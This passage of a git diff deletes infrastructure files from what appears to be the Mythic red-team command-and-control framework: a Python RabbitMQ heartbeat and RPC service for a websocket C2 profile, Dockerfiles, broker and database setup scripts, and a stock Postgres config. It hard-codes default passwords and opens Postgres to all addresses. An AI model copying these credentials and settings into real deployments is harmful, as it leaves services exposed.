" + str(e) - ) - sys.stdout.flush() - - -async def connect_and_consume_rpc(): - connection = None - global hostname - while connection is None: - try: - connection = await aio_pika.connect_robust( - host="127.0.0.1", - login="mythic_user", - password="mythic_password", - virtualhost="mythic_vhost", - ) - channel = await connection.channel() - # get a random queue that only the apfell server will use to listen on to catch all heartbeats - queue = await channel.declare_queue("{}_rpc_queue".format(hostname)) - await channel.set_qos(prefetch_count=50) - try: - task = queue.consume( - partial(rabbit_c2_rpc_callback, channel.default_exchange) - ) - result = await asyncio.wait_for(task, None) - except Exception as e: - print("Exception in connect_and_consume .consume: {}".format(str(e))) - sys.stdout.flush() - except (ConnectionError, ConnectionRefusedError) as c: - print("Connection to rabbitmq failed, trying again...") - sys.stdout.flush() - except Exception as e: - print("Exception in connect_and_consume_rpc connect: {}".format(str(e))) - # print("Exception in connect_and_consume connect: {}".format(str(e))) - sys.stdout.flush() - await asyncio.sleep(2) - - -async def mythic_service(): - global hostname - global exchange - global container_files_path - connection = None - config_file = open("rabbitmq_config.json", "rb") - main_config = json.loads(config_file.read().decode("utf-8")) - config_file.close() - if main_config["name"] == "hostname": - hostname = socket.gethostname() - else: - hostname = main_config["name"] - container_files_path = pathlib.Path( - os.path.abspath(main_config["container_files_path"]) - ) - container_files_path = container_files_path / "c2_code" - while connection is None: - try: - connection = await aio_pika.connect_robust( - host=main_config["host"], - login=main_config["username"], - password=main_config["password"], - virtualhost=main_config["virtual_host"], - ) - except Exception as e: - await asyncio.sleep(2) - try: - channel = await connection.channel() - exchange = await channel.declare_exchange( - "mythic_traffic", aio_pika.ExchangeType.TOPIC - ) - queue = await channel.declare_queue("", exclusive=True) - await queue.bind( - exchange="mythic_traffic", routing_key="c2.modify.{}.#".format(hostname) - ) - # just want to handle one message at a time so we can clean up and be ready - await channel.set_qos(prefetch_count=30) - print("Listening for c2.modify.{}.#".format(hostname)) - sys.stdout.flush() - task = queue.consume(callback) - await sync_classes() - task4 = asyncio.ensure_future(connect_and_consume_rpc()) - result = await asyncio.gather(task, task4) - # send_status(message="", routing_key="c2.status.{}.stopped.stop".format(hostname)) - except Exception as e: - print(str(traceback.format_exc())) - sys.stdout.flush() - - -async def heartbeat_loop(): - config_file = open("rabbitmq_config.json", "rb") - main_config = json.loads(config_file.read().decode("utf-8")) - config_file.close() - if main_config["name"] == "hostname": - hostname = socket.gethostname() - else: - hostname = main_config["name"] - while True: - try: - connection = await aio_pika.connect_robust( - host=main_config["host"], - login=main_config["username"], - password=main_config["password"], - virtualhost=main_config["virtual_host"], - ) - channel = await connection.channel() - # declare our heartbeat exchange that everybody will publish to, but only the apfell server will are about - exchange = await channel.declare_exchange( - "mythic_traffic", aio_pika.ExchangeType.TOPIC - ) - except 
Exception as e: - print(str(e)) - await asyncio.sleep(2) - continue - while True: - try: - # routing key is ignored for fanout, it'll go to anybody that's listening, which will only be the server - await exchange.publish( - aio_pika.Message("heartbeat".encode()), - routing_key="c2.heartbeat.{}".format(hostname), - ) - await asyncio.sleep(10) - except Exception as e: - print(str(e)) - # if we get an exception here, break out to the bigger loop and try to connect again - break - -# start our service -loop = asyncio.get_event_loop() -loop.create_task(mythic_service()) -loop.create_task(heartbeat_loop()) -loop.run_forever() diff --git a/C2_Profiles/websocket/mythic/rabbitmq_config.json b/C2_Profiles/websocket/mythic/rabbitmq_config.json deleted file mode 100755 index 08581c01a..000000000 --- a/C2_Profiles/websocket/mythic/rabbitmq_config.json +++ /dev/null @@ -1,8 +0,0 @@ -{ - "username": "mythic_user", - "password": "mythic_password", - "virtual_host": "mythic_vhost", - "host": "127.0.0.1", - "name": "hostname", - "container_files_path": "/Mythic/" -} \ No newline at end of file diff --git a/Docker_Templates/Docker_C2_Profile_base_files/Dockerfile b/Docker_Templates/Docker_C2_Profile_base_files/Dockerfile deleted file mode 100755 index b2feaaac0..000000000 --- a/Docker_Templates/Docker_C2_Profile_base_files/Dockerfile +++ /dev/null @@ -1,9 +0,0 @@ -From python:3.6-jessie -RUN pip install aio_pika - -RUN mkdir /Mythic_service 2>/dev/null -COPY ["c2_service.sh", "/Mythic_service/c2_service.sh"] -RUN chmod +x /Mythic_service/c2_service.sh -WORKDIR /Mythic_service/ - -ENTRYPOINT ["/Mythic_service/c2_service.sh"] diff --git a/Docker_Templates/Docker_C2_Profile_base_files/c2_service.sh b/Docker_Templates/Docker_C2_Profile_base_files/c2_service.sh deleted file mode 100755 index 00627848a..000000000 --- a/Docker_Templates/Docker_C2_Profile_base_files/c2_service.sh +++ /dev/null @@ -1,7 +0,0 @@ -#!/bin/bash - -cd /Mythic/mythic - -export PYTHONPATH=/Mythic:/Mythic/mythic - -python3.8 mythic_service.py diff --git a/Docker_Templates/Docker_C2_Profile_base_files/create_base_images.sh b/Docker_Templates/Docker_C2_Profile_base_files/create_base_images.sh deleted file mode 100755 index 3e6b450cc..000000000 --- a/Docker_Templates/Docker_C2_Profile_base_files/create_base_images.sh +++ /dev/null @@ -1,4 +0,0 @@ -echo "Pruning old images..." -docker image prune -f -echo "Building golden python3.8 sanic image..." -docker build -f "python38_sanic_dockerfile" --rm -t "python38_sanic_c2profile" . 
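Everything an operator does to one of these profile containers rides the topic exchange wired up in mythic_service.py above: commands arrive on c2.modify.{hostname}.{command}.{username}, the container answers on c2.status.{hostname}.{running|stopped}.{command}.{username}, and heartbeat_loop() publishes c2.heartbeat.{hostname} every ten seconds. A sketch of the publishing side of a start command, reusing the same aio_pika calls and the default rabbitmq_config.json credentials; the hostname "websocket" and operator "admin" are assumptions:

# Hedged sketch: publishes a start command the way the server side would,
# against the c2.modify.{hostname}.# binding declared in mythic_service.py.
import asyncio

import aio_pika


async def send_start(hostname: str = "websocket", operator: str = "admin") -> None:
    connection = await aio_pika.connect_robust(
        host="127.0.0.1",
        login="mythic_user",
        password="mythic_password",
        virtualhost="mythic_vhost",
    )
    channel = await connection.channel()
    exchange = await channel.declare_exchange(
        "mythic_traffic", aio_pika.ExchangeType.TOPIC
    )
    # callback() pulls the command from index 3 and the username from index 4.
    await exchange.publish(
        aio_pika.Message(b""),
        routing_key="c2.modify.{}.start.{}".format(hostname, operator),
    )
    await connection.close()


# asyncio.get_event_loop().run_until_complete(send_start())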
\ No newline at end of file diff --git a/Docker_Templates/Docker_C2_Profile_base_files/python38_sanic_dockerfile b/Docker_Templates/Docker_C2_Profile_base_files/python38_sanic_dockerfile deleted file mode 100644 index fb4fe1541..000000000 --- a/Docker_Templates/Docker_C2_Profile_base_files/python38_sanic_dockerfile +++ /dev/null @@ -1,6 +0,0 @@ -From python:3.8-buster -RUN pip install aio_pika sanic requests - -ENV PYTHONWARNINGS="ignore:Unverified HTTPS request" - -ENTRYPOINT ["/Mythic/mythic/c2_service.sh"] \ No newline at end of file diff --git a/Docker_Templates/Docker_Mythic_Services_base_files/config_rabbit.sh b/Docker_Templates/Docker_Mythic_Services_base_files/config_rabbit.sh deleted file mode 100755 index a1def7a38..000000000 --- a/Docker_Templates/Docker_Mythic_Services_base_files/config_rabbit.sh +++ /dev/null @@ -1,35 +0,0 @@ -#!/bin/bash - -# This script needs to be executed just once -if [ -f /$0.completed ] ; then - echo "$0 `date` /$0.completed found, skipping run" - exit 0 -fi - -# Wait for RabbitMQ startup -for (( ; ; )) ; do - sleep 2 - rabbitmqctl -q node_health_check > /dev/null 2>&1 - if [ $? -eq 0 ] ; then - echo "$0 `date` rabbitmq is now running" - break - else - echo "$0 `date` waiting for rabbitmq startup" - fi -done - -# Execute RabbitMQ config commands here - -# Create user -rabbitmqctl add_user mythic_user mythic_password -rabbitmqctl add_vhost mythic_vhost -rabbitmqctl set_user_tags mythic_user administrator -rabbitmqctl set_permissions -p mythic_vhost mythic_user ".*" ".*" ".*" -echo "$0 `date` user mythic_user created" - -# Create queue -#rabbitmqadmin declare queue name=QUEUE durable=true -#echo "$0 `date` queues created" - -# Create mark so script is not ran again -touch /$0.completed diff --git a/Docker_Templates/Docker_Mythic_Services_base_files/create_base_images.sh b/Docker_Templates/Docker_Mythic_Services_base_files/create_base_images.sh deleted file mode 100755 index 550bdb8a2..000000000 --- a/Docker_Templates/Docker_Mythic_Services_base_files/create_base_images.sh +++ /dev/null @@ -1,12 +0,0 @@ -echo "Pruning old images..." -docker image prune -f -echo "Building golden postgres image..." -docker build -f "mythic_postgres" --rm -t "mythic_postgres" . - -docker image prune -f -echo "Building golden rabbitmq image..." -docker build -f "mythic_rabbitmq" --rm -t "mythic_rabbitmq" . - -docker image prune -f -echo "Building golden server image..." -docker build -f "mythic_server" --rm -t "mythic_server" . 
\ No newline at end of file diff --git a/Docker_Templates/Docker_Mythic_Services_base_files/init.sh b/Docker_Templates/Docker_Mythic_Services_base_files/init.sh deleted file mode 100755 index cd631b121..000000000 --- a/Docker_Templates/Docker_Mythic_Services_base_files/init.sh +++ /dev/null @@ -1,8 +0,0 @@ -#!/bin/bash - -# Launch config script in background -# Note there is no RabbitMQ Docker image support for executing commands after server (PID 1) is running (something like "ADD schema.sql /docker-entrypoint-initdb.d" in MySql image), so we are using this trick -/config_rabbit.sh & - -# Launch -/docker-entrypoint.sh rabbitmq-server diff --git a/Docker_Templates/Docker_Mythic_Services_base_files/mythic_postgres b/Docker_Templates/Docker_Mythic_Services_base_files/mythic_postgres deleted file mode 100644 index 34f160b83..000000000 --- a/Docker_Templates/Docker_Mythic_Services_base_files/mythic_postgres +++ /dev/null @@ -1,6 +0,0 @@ -From postgres:9.4 -COPY postgres.conf /etc/postgresql/postgresql.conf -ENV config_file=/etc/postgresql/postgresql.conf -ENV POSTGRES_USER 'mythic_user' -ENV POSTGRES_PASSWORD 'super_secret_mythic_user_password' -ENV POSTGRES_DB 'mythic_db' diff --git a/Docker_Templates/Docker_Mythic_Services_base_files/mythic_rabbitmq b/Docker_Templates/Docker_Mythic_Services_base_files/mythic_rabbitmq deleted file mode 100644 index 289d6c0c4..000000000 --- a/Docker_Templates/Docker_Mythic_Services_base_files/mythic_rabbitmq +++ /dev/null @@ -1,7 +0,0 @@ -FROM rabbitmq:3.7.6-management - -ADD init.sh / -ADD config_rabbit.sh / -RUN chmod +x /init.sh /config_rabbit.sh - -ENTRYPOINT ["/init.sh"] diff --git a/Docker_Templates/Docker_Mythic_Services_base_files/mythic_server b/Docker_Templates/Docker_Mythic_Services_base_files/mythic_server deleted file mode 100644 index 753648fe4..000000000 --- a/Docker_Templates/Docker_Mythic_Services_base_files/mythic_server +++ /dev/null @@ -1,5 +0,0 @@ -From python:3.8-buster -RUN mkdir /Mythic -WORKDIR /Mythic -COPY ["requirements.txt", "/Mythic/requirements.txt"] -RUN pip install -r /Mythic/requirements.txt diff --git a/Docker_Templates/Docker_Mythic_Services_base_files/postgres.conf b/Docker_Templates/Docker_Mythic_Services_base_files/postgres.conf deleted file mode 100755 index a5b3e95c6..000000000 --- a/Docker_Templates/Docker_Mythic_Services_base_files/postgres.conf +++ /dev/null @@ -1,610 +0,0 @@ -# ----------------------------- -# PostgreSQL configuration file -# ----------------------------- -# -# This file consists of lines of the form: -# -# name = value -# -# (The "=" is optional.) Whitespace may be used. Comments are introduced with -# "#" anywhere on a line. The complete list of parameter names and allowed -# values can be found in the PostgreSQL documentation. -# -# The commented-out settings shown in this file represent the default values. -# Re-commenting a setting is NOT sufficient to revert it to the default value; -# you need to reload the server. -# -# This file is read on server startup and when the server receives a SIGHUP -# signal. If you edit the file on a running system, you have to SIGHUP the -# server for the changes to take effect, or use "pg_ctl reload". Some -# parameters, which are marked below, require a server shutdown and restart to -# take effect. -# -# Any parameter can also be given as a command-line option to the server, e.g., -# "postgres -c log_connections=on". Some parameters can be changed at run time -# with the "SET" SQL command. 
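As an aside on the services being removed here: the mythic_postgres image above hard-codes the mythic_user / mythic_db credentials and ships this stock postgres.conf with listen_addresses opened up (seen just below), so any component with a PostgreSQL driver can reach the database directly. A minimal connection sketch, for illustration only; the host address and default port 5432 are assumptions, while the credentials come from the deleted Dockerfile:

import psycopg2  # provided by psycopg2-binary in the deleted requirements.txt

conn = psycopg2.connect(
    host="127.0.0.1",                              # assumed published address
    port=5432,                                     # postgres.conf keeps the default port
    user="mythic_user",
    password="super_secret_mythic_user_password",  # from the mythic_postgres Dockerfile
    dbname="mythic_db",
)
with conn.cursor() as cur:
    cur.execute("SELECT version();")
    print(cur.fetchone()[0])
conn.close()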
-# -# Memory units: kB = kilobytes Time units: ms = milliseconds -# MB = megabytes s = seconds -# GB = gigabytes min = minutes -# TB = terabytes h = hours -# d = days - - -#------------------------------------------------------------------------------ -# FILE LOCATIONS -#------------------------------------------------------------------------------ - -# The default values of these variables are driven from the -D command-line -# option or PGDATA environment variable, represented here as ConfigDir. - -#data_directory = 'ConfigDir' # use data in another directory - # (change requires restart) -#hba_file = 'ConfigDir/pg_hba.conf' # host-based authentication file - # (change requires restart) -#ident_file = 'ConfigDir/pg_ident.conf' # ident configuration file - # (change requires restart) - -# If external_pid_file is not explicitly set, no extra PID file is written. -#external_pid_file = '' # write an extra PID file - # (change requires restart) - - -#------------------------------------------------------------------------------ -# CONNECTIONS AND AUTHENTICATION -#------------------------------------------------------------------------------ - -# - Connection Settings - - -listen_addresses = '*' - # comma-separated list of addresses; - # defaults to 'localhost'; use '*' for all - # (change requires restart) -#port = 5432 # (change requires restart) -#max_connections = 100 # (change requires restart) -#superuser_reserved_connections = 3 # (change requires restart) -#unix_socket_directories = '/tmp' # comma-separated list of directories - # (change requires restart) -#unix_socket_group = '' # (change requires restart) -#unix_socket_permissions = 0777 # begin with 0 to use octal notation - # (change requires restart) -#bonjour = off # advertise server via Bonjour - # (change requires restart) -#bonjour_name = '' # defaults to the computer name - # (change requires restart) - -# - Security and Authentication - - -#authentication_timeout = 1min # 1s-600s -#ssl = off # (change requires restart) -#ssl_ciphers = 'HIGH:MEDIUM:+3DES:!aNULL' # allowed SSL ciphers - # (change requires restart) -#ssl_prefer_server_ciphers = on # (change requires restart) -#ssl_ecdh_curve = 'prime256v1' # (change requires restart) -#ssl_renegotiation_limit = 0 # amount of data between renegotiations -#ssl_cert_file = 'server.crt' # (change requires restart) -#ssl_key_file = 'server.key' # (change requires restart) -#ssl_ca_file = '' # (change requires restart) -#ssl_crl_file = '' # (change requires restart) -#password_encryption = on -#db_user_namespace = off - -# GSSAPI using Kerberos -#krb_server_keyfile = '' -#krb_caseins_users = off - -# - TCP Keepalives - -# see "man 7 tcp" for details - -#tcp_keepalives_idle = 0 # TCP_KEEPIDLE, in seconds; - # 0 selects the system default -#tcp_keepalives_interval = 0 # TCP_KEEPINTVL, in seconds; - # 0 selects the system default -#tcp_keepalives_count = 0 # TCP_KEEPCNT; - # 0 selects the system default - - -#------------------------------------------------------------------------------ -# RESOURCE USAGE (except WAL) -#------------------------------------------------------------------------------ - -# - Memory - - -#shared_buffers = 32MB # min 128kB - # (change requires restart) -#huge_pages = try # on, off, or try - # (change requires restart) -#temp_buffers = 8MB # min 800kB -#max_prepared_transactions = 0 # zero disables the feature - # (change requires restart) -# Caution: it is not advisable to set max_prepared_transactions nonzero unless -# you actively intend to use prepared 
transactions. -#work_mem = 4MB # min 64kB -#maintenance_work_mem = 64MB # min 1MB -#autovacuum_work_mem = -1 # min 1MB, or -1 to use maintenance_work_mem -#max_stack_depth = 2MB # min 100kB -#dynamic_shared_memory_type = posix # the default is the first option - # supported by the operating system: - # posix - # sysv - # windows - # mmap - # use none to disable dynamic shared memory - # (change requires restart) - -# - Disk - - -#temp_file_limit = -1 # limits per-session temp file space - # in kB, or -1 for no limit - -# - Kernel Resource Usage - - -#max_files_per_process = 1000 # min 25 - # (change requires restart) -#shared_preload_libraries = '' # (change requires restart) - -# - Cost-Based Vacuum Delay - - -#vacuum_cost_delay = 0 # 0-100 milliseconds -#vacuum_cost_page_hit = 1 # 0-10000 credits -#vacuum_cost_page_miss = 10 # 0-10000 credits -#vacuum_cost_page_dirty = 20 # 0-10000 credits -#vacuum_cost_limit = 200 # 1-10000 credits - -# - Background Writer - - -#bgwriter_delay = 200ms # 10-10000ms between rounds -#bgwriter_lru_maxpages = 100 # 0-1000 max buffers written/round -#bgwriter_lru_multiplier = 2.0 # 0-10.0 multipler on buffers scanned/round - -# - Asynchronous Behavior - - -#effective_io_concurrency = 1 # 1-1000; 0 disables prefetching -#max_worker_processes = 8 - - -#------------------------------------------------------------------------------ -# WRITE AHEAD LOG -#------------------------------------------------------------------------------ - -# - Settings - - -#wal_level = minimal # minimal, archive, hot_standby, or logical - # (change requires restart) -#fsync = on # turns forced synchronization on or off -#synchronous_commit = on # synchronization level; - # off, local, remote_write, or on -#wal_sync_method = fsync # the default is the first option - # supported by the operating system: - # open_datasync - # fdatasync (default on Linux) - # fsync - # fsync_writethrough - # open_sync -#full_page_writes = on # recover from partial page writes -#wal_log_hints = off # also do full page writes of non-critical updates - # (change requires restart) -#wal_buffers = -1 # min 32kB, -1 sets based on shared_buffers - # (change requires restart) -#wal_writer_delay = 200ms # 1-10000 milliseconds - -#commit_delay = 0 # range 0-100000, in microseconds -#commit_siblings = 5 # range 1-1000 - -# - Checkpoints - - -#checkpoint_segments = 3 # in logfile segments, min 1, 16MB each -#checkpoint_timeout = 5min # range 30s-1h -#checkpoint_completion_target = 0.5 # checkpoint target duration, 0.0 - 1.0 -#checkpoint_warning = 30s # 0 disables - -# - Archiving - - -#archive_mode = off # allows archiving to be done - # (change requires restart) -#archive_command = '' # command to use to archive a logfile segment - # placeholders: %p = path of file to archive - # %f = file name only - # e.g. 'test ! -f /mnt/server/archivedir/%f && cp %p /mnt/server/archivedir/%f' -#archive_timeout = 0 # force a logfile segment switch after this - # number of seconds; 0 disables - - -#------------------------------------------------------------------------------ -# REPLICATION -#------------------------------------------------------------------------------ - -# - Sending Server(s) - - -# Set these on the master and on any standby that will send replication data. 
- -#max_wal_senders = 0 # max number of walsender processes - # (change requires restart) -#wal_keep_segments = 0 # in logfile segments, 16MB each; 0 disables -#wal_sender_timeout = 60s # in milliseconds; 0 disables - -#max_replication_slots = 0 # max number of replication slots - # (change requires restart) - -# - Master Server - - -# These settings are ignored on a standby server. - -#synchronous_standby_names = '' # standby servers that provide sync rep - # comma-separated list of application_name - # from standby(s); '*' = all -#vacuum_defer_cleanup_age = 0 # number of xacts by which cleanup is delayed - -# - Standby Servers - - -# These settings are ignored on a master server. - -#hot_standby = off # "on" allows queries during recovery - # (change requires restart) -#max_standby_archive_delay = 30s # max delay before canceling queries - # when reading WAL from archive; - # -1 allows indefinite delay -#max_standby_streaming_delay = 30s # max delay before canceling queries - # when reading streaming WAL; - # -1 allows indefinite delay -#wal_receiver_status_interval = 10s # send replies at least this often - # 0 disables -#hot_standby_feedback = off # send info from standby to prevent - # query conflicts -#wal_receiver_timeout = 60s # time that receiver waits for - # communication from master - # in milliseconds; 0 disables - - -#------------------------------------------------------------------------------ -# QUERY TUNING -#------------------------------------------------------------------------------ - -# - Planner Method Configuration - - -#enable_bitmapscan = on -#enable_hashagg = on -#enable_hashjoin = on -#enable_indexscan = on -#enable_indexonlyscan = on -#enable_material = on -#enable_mergejoin = on -#enable_nestloop = on -#enable_seqscan = on -#enable_sort = on -#enable_tidscan = on - -# - Planner Cost Constants - - -#seq_page_cost = 1.0 # measured on an arbitrary scale -#random_page_cost = 4.0 # same scale as above -#cpu_tuple_cost = 0.01 # same scale as above -#cpu_index_tuple_cost = 0.005 # same scale as above -#cpu_operator_cost = 0.0025 # same scale as above -#effective_cache_size = 4GB - -# - Genetic Query Optimizer - - -#geqo = on -#geqo_threshold = 12 -#geqo_effort = 5 # range 1-10 -#geqo_pool_size = 0 # selects default based on effort -#geqo_generations = 0 # selects default based on effort -#geqo_selection_bias = 2.0 # range 1.5-2.0 -#geqo_seed = 0.0 # range 0.0-1.0 - -# - Other Planner Options - - -#default_statistics_target = 100 # range 1-10000 -#constraint_exclusion = partition # on, off, or partition -#cursor_tuple_fraction = 0.1 # range 0.0-1.0 -#from_collapse_limit = 8 -#join_collapse_limit = 8 # 1 disables collapsing of explicit - # JOIN clauses - - -#------------------------------------------------------------------------------ -# ERROR REPORTING AND LOGGING -#------------------------------------------------------------------------------ - -# - Where to Log - - -#log_destination = 'stderr' # Valid values are combinations of - # stderr, csvlog, syslog, and eventlog, - # depending on platform. csvlog - # requires logging_collector to be on. - -# This is used when logging to stderr: -#logging_collector = off # Enable capturing of stderr and csvlog - # into log files. Required to be on for - # csvlogs. 
- # (change requires restart) - -# These are only used if logging_collector is on: -#log_directory = 'pg_log' # directory where log files are written, - # can be absolute or relative to PGDATA -#log_filename = 'postgresql-%Y-%m-%d_%H%M%S.log' # log file name pattern, - # can include strftime() escapes -#log_file_mode = 0600 # creation mode for log files, - # begin with 0 to use octal notation -#log_truncate_on_rotation = off # If on, an existing log file with the - # same name as the new log file will be - # truncated rather than appended to. - # But such truncation only occurs on - # time-driven rotation, not on restarts - # or size-driven rotation. Default is - # off, meaning append to existing files - # in all cases. -#log_rotation_age = 1d # Automatic rotation of logfiles will - # happen after that time. 0 disables. -#log_rotation_size = 10MB # Automatic rotation of logfiles will - # happen after that much log output. - # 0 disables. - -# These are relevant when logging to syslog: -#syslog_facility = 'LOCAL0' -#syslog_ident = 'postgres' - -# This is only relevant when logging to eventlog (win32): -# (change requires restart) -#event_source = 'PostgreSQL' - -# - When to Log - - -#log_min_messages = warning # values in order of decreasing detail: - # debug5 - # debug4 - # debug3 - # debug2 - # debug1 - # info - # notice - # warning - # error - # log - # fatal - # panic - -#log_min_error_statement = error # values in order of decreasing detail: - # debug5 - # debug4 - # debug3 - # debug2 - # debug1 - # info - # notice - # warning - # error - # log - # fatal - # panic (effectively off) - -#log_min_duration_statement = -1 # -1 is disabled, 0 logs all statements - # and their durations, > 0 logs only - # statements running at least this number - # of milliseconds - - -# - What to Log - - -#debug_print_parse = off -#debug_print_rewritten = off -#debug_print_plan = off -#debug_pretty_print = on -#log_checkpoints = off -#log_connections = off -#log_disconnections = off -#log_duration = off -#log_error_verbosity = default # terse, default, or verbose messages -#log_hostname = off -#log_line_prefix = '' # special values: - # %a = application name - # %u = user name - # %d = database name - # %r = remote host and port - # %h = remote host - # %p = process ID - # %t = timestamp without milliseconds - # %m = timestamp with milliseconds - # %i = command tag - # %e = SQL state - # %c = session ID - # %l = session line number - # %s = session start timestamp - # %v = virtual transaction ID - # %x = transaction ID (0 if none) - # %q = stop here in non-session - # processes - # %% = '%' - # e.g. 
'<%u%%%d> ' -#log_lock_waits = off # log lock waits >= deadlock_timeout -#log_statement = 'none' # none, ddl, mod, all -#log_temp_files = -1 # log temporary files equal or larger - # than the specified size in kilobytes; - # -1 disables, 0 logs all temp files -#log_timezone = 'GMT' - - -#------------------------------------------------------------------------------ -# RUNTIME STATISTICS -#------------------------------------------------------------------------------ - -# - Query/Index Statistics Collector - - -#track_activities = on -#track_counts = on -#track_io_timing = off -#track_functions = none # none, pl, all -#track_activity_query_size = 1024 # (change requires restart) -#update_process_title = on -#stats_temp_directory = 'pg_stat_tmp' - - -# - Statistics Monitoring - - -#log_parser_stats = off -#log_planner_stats = off -#log_executor_stats = off -#log_statement_stats = off - - -#------------------------------------------------------------------------------ -# AUTOVACUUM PARAMETERS -#------------------------------------------------------------------------------ - -#autovacuum = on # Enable autovacuum subprocess? 'on' - # requires track_counts to also be on. -#log_autovacuum_min_duration = -1 # -1 disables, 0 logs all actions and - # their durations, > 0 logs only - # actions running at least this number - # of milliseconds. -#autovacuum_max_workers = 3 # max number of autovacuum subprocesses - # (change requires restart) -#autovacuum_naptime = 1min # time between autovacuum runs -#autovacuum_vacuum_threshold = 50 # min number of row updates before - # vacuum -#autovacuum_analyze_threshold = 50 # min number of row updates before - # analyze -#autovacuum_vacuum_scale_factor = 0.2 # fraction of table size before vacuum -#autovacuum_analyze_scale_factor = 0.1 # fraction of table size before analyze -#autovacuum_freeze_max_age = 200000000 # maximum XID age before forced vacuum - # (change requires restart) -#autovacuum_multixact_freeze_max_age = 400000000 # maximum multixact age - # before forced vacuum - # (change requires restart) -#autovacuum_vacuum_cost_delay = 20ms # default vacuum cost delay for - # autovacuum, in milliseconds; - # -1 means use vacuum_cost_delay -#autovacuum_vacuum_cost_limit = -1 # default vacuum cost limit for - # autovacuum, -1 means use - # vacuum_cost_limit - - -#------------------------------------------------------------------------------ -# CLIENT CONNECTION DEFAULTS -#------------------------------------------------------------------------------ - -# - Statement Behavior - - -#client_min_messages = notice # values in order of decreasing detail: - # debug5 - # debug4 - # debug3 - # debug2 - # debug1 - # log - # notice - # warning - # error -#search_path = '"$user",public' # schema names -#default_tablespace = '' # a tablespace name, '' uses the default -#temp_tablespaces = '' # a list of tablespace names, '' uses - # only default tablespace -#check_function_bodies = on -#default_transaction_isolation = 'read committed' -#default_transaction_read_only = off -#default_transaction_deferrable = off -#session_replication_role = 'origin' -#statement_timeout = 0 # in milliseconds, 0 is disabled -#lock_timeout = 0 # in milliseconds, 0 is disabled -#vacuum_freeze_min_age = 50000000 -#vacuum_freeze_table_age = 150000000 -#vacuum_multixact_freeze_min_age = 5000000 -#vacuum_multixact_freeze_table_age = 150000000 -#bytea_output = 'hex' # hex, escape -#xmlbinary = 'base64' -#xmloption = 'content' -#gin_fuzzy_search_limit = 0 - -# - Locale and Formatting - - -#datestyle 
= 'iso, mdy' -#intervalstyle = 'postgres' -#timezone = 'GMT' -#timezone_abbreviations = 'Default' # Select the set of available time zone - # abbreviations. Currently, there are - # Default - # Australia (historical usage) - # India - # You can create your own file in - # share/timezonesets/. -#extra_float_digits = 0 # min -15, max 3 -#client_encoding = sql_ascii # actually, defaults to database - # encoding - -# These settings are initialized by initdb, but they can be changed. -#lc_messages = 'C' # locale for system error message - # strings -#lc_monetary = 'C' # locale for monetary formatting -#lc_numeric = 'C' # locale for number formatting -#lc_time = 'C' # locale for time formatting - -# default configuration for text search -#default_text_search_config = 'pg_catalog.simple' - -# - Other Defaults - - -#dynamic_library_path = '$libdir' -#local_preload_libraries = '' -#session_preload_libraries = '' - - -#------------------------------------------------------------------------------ -# LOCK MANAGEMENT -#------------------------------------------------------------------------------ - -#deadlock_timeout = 1s -#max_locks_per_transaction = 64 # min 10 - # (change requires restart) -#max_pred_locks_per_transaction = 64 # min 10 - # (change requires restart) - - -#------------------------------------------------------------------------------ -# VERSION/PLATFORM COMPATIBILITY -#------------------------------------------------------------------------------ - -# - Previous PostgreSQL Versions - - -#array_nulls = on -#backslash_quote = safe_encoding # on, off, or safe_encoding -#default_with_oids = off -#escape_string_warning = on -#lo_compat_privileges = off -#quote_all_identifiers = off -#sql_inheritance = on -#standard_conforming_strings = on -#synchronize_seqscans = on - -# - Other Platforms and Clients - - -#transform_null_equals = off - - -#------------------------------------------------------------------------------ -# ERROR HANDLING -#------------------------------------------------------------------------------ - -#exit_on_error = off # terminate session on any error? -#restart_after_crash = on # reinitialize after backend crash? -#data_sync_retry = off # retry or panic on failure to fsync data? - - -#------------------------------------------------------------------------------ -# CONFIG FILE INCLUDES -#------------------------------------------------------------------------------ - -# These options allow settings to be loaded from files other than the -# default postgresql.conf. 
- -#include_dir = 'conf.d' # include files ending in '.conf' from - # directory 'conf.d' -#include_if_exists = 'exists.conf' # include file only if it exists -#include = 'special.conf' # include file - - -#------------------------------------------------------------------------------ -# CUSTOMIZED OPTIONS -#------------------------------------------------------------------------------ - -# Add settings for extensions here diff --git a/Docker_Templates/Docker_Mythic_Services_base_files/requirements.txt b/Docker_Templates/Docker_Mythic_Services_base_files/requirements.txt deleted file mode 100755 index 35f0ad6a8..000000000 --- a/Docker_Templates/Docker_Mythic_Services_base_files/requirements.txt +++ /dev/null @@ -1,21 +0,0 @@ -sanic -psycopg2-binary -peewee-async -aiopg -peewee -jinja2 -uvloop==0.14.0.rc1 -git+https://github.com/mikekeda/sanic-wtf -pycryptodome -wtforms -anytree -websockets -sanic-jwt -fpdf -aio-pika -requests -dijkstar -exrex -treelib -shortuuid -ujson \ No newline at end of file diff --git a/Docker_Templates/Docker_Payload_Type_base_files/System.Management.Automation.dll b/Docker_Templates/Docker_Payload_Type_base_files/System.Management.Automation.dll deleted file mode 100644 index 3ca6528d8..000000000 Binary files a/Docker_Templates/Docker_Payload_Type_base_files/System.Management.Automation.dll and /dev/null differ diff --git a/Docker_Templates/Docker_Payload_Type_base_files/System.Management.Automation.dll-v4 b/Docker_Templates/Docker_Payload_Type_base_files/System.Management.Automation.dll-v4 deleted file mode 100644 index 4ee8da017..000000000 Binary files a/Docker_Templates/Docker_Payload_Type_base_files/System.Management.Automation.dll-v4 and /dev/null differ diff --git a/Docker_Templates/Docker_Payload_Type_base_files/bootstrap_pure.sh b/Docker_Templates/Docker_Payload_Type_base_files/bootstrap_pure.sh deleted file mode 100644 index c6dde4052..000000000 --- a/Docker_Templates/Docker_Payload_Type_base_files/bootstrap_pure.sh +++ /dev/null @@ -1,38 +0,0 @@ -#!/bin/bash -# -# Contains the Go tool-chain pure-Go bootstrapper, that as of Go 1.5, initiates -# not only a few pre-built Go cross compilers, but rather bootstraps all of the -# supported platforms from the origin Linux amd64 distribution. -# -# Usage: bootstrap_pure.sh -# -# Environment variables for remote bootstrapping: -# FETCH - Remote file fetcher and checksum verifier (injected by image) -# ROOT_DIST - 64 bit Linux Go binary distribution package -# ROOT_DIST_SHA - 64 bit Linux Go distribution package checksum -# -# Environment variables for local bootstrapping: -# GOROOT - Path to the lready installed Go runtime -set -e - -# Download, verify and install the root distribution if pulled remotely -if [ "$GOROOT" == "" ]; then - $FETCH $ROOT_DIST $ROOT_DIST_SHA - - tar -C /usr/local -xzf `basename $ROOT_DIST` - rm -f `basename $ROOT_DIST` - - export GOROOT=/usr/local/go -fi -export GOROOT_BOOTSTRAP=$GOROOT - -echo "Bootstrapping linux/arm64..." -GOOS=linux GOARCH=arm64 CGO_ENABLED=1 